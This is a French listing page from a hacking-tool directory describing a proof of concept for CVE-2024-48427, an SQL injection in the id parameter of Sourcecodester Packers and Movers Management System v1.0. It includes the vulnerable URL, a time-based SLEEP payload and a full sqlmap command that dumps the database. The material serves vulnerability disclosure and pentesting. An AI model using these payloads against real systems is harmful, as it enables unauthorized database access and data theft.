Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-48427 — Preuve de concept pour CVE-2024-48427 : injection SQL dans Sourcecodester Packers and Movers Management System v1.0. Exploite le paramètre id pour exécuter des commandes SQL arbitraires et extraire le contenu de la base de données. | Kitploit
Outils/GitHubGitHub/vighneshnair7/cve-2024-48427
Analyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'IntrusionSécurité des Bases de Données
GitHubvighneshnair7/cve-2024-48427

CVE-2024-48427

Preuve de concept pour CVE-2024-48427 : injection SQL dans Sourcecodester Packers and Movers Management System v1.0. Exploite le paramètre id pour exécuter des commandes SQL arbitraires et extraire le contenu de la base de données.

Voir le dépôt
1il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2024-48427

Description

Une vulnérabilité d'injection SQL dans Sourcecodester Packers and Movers Management System v1.0 permet aux utilisateurs authentifiés distants d'exécuter des commandes SQL arbitraires via le paramètre id dans /mpms/admin/?page=services/manage_service&id

Type de vulnérabilité

Injection SQL

Fournisseur du produit

Sourcecodester

Base de code du produit affecté :

https://www.sourcecodester.com/php/15360/packers-and-movers-management-system-phpoop-free-source-code.html - 1.0

Composant affecté :

Le paramètre id de Mise à jour des détails du service à /mpms/admin/?page=services/manage_service&id

Vecteurs d'attaque :

  1. Configurer l'application localement et se connecter au panneau d'administration en utilisant les identifiants par défaut fournis.
  2. Naviguer vers la page vulnérable : http://localhost/mpms/admin/?page=services/manage_service&id=2
  3. Injecter la charge utile SQL dans le paramètre id : http://localhost/mpms/admin/?page=services/manage_service&id=1' OR SLEEP(5)-- puNr
  4. Observer la réponse de l'application : La page devrait prendre sensiblement plus de temps (5 secondes) à charger si l'injection est réussie, confirmant que le paramètre id est vulnérable à l'injection SQL.
  5. Exécuter maintenant l'outil SQLMap pour extraire les détails de la base de données :
  6. sqlmap -u "http://localhost/mpms/admin/?page=services/manage_service&id=1" --cookie="phpMyAdmin=ju34bd3d8q0jdf6td4ntqscaqd;PHPSESSID=eopn8q1p8c1f5m1v5igjoir8k1;" --dbms mysql -p id --risk 3 --level 4 --dbs --dump

Références :

  1. https://owasp.org/www-community/attacks/SQL_Injection
  2. https://portswigger.net/web-security/sql-injection
Télécharger l’outil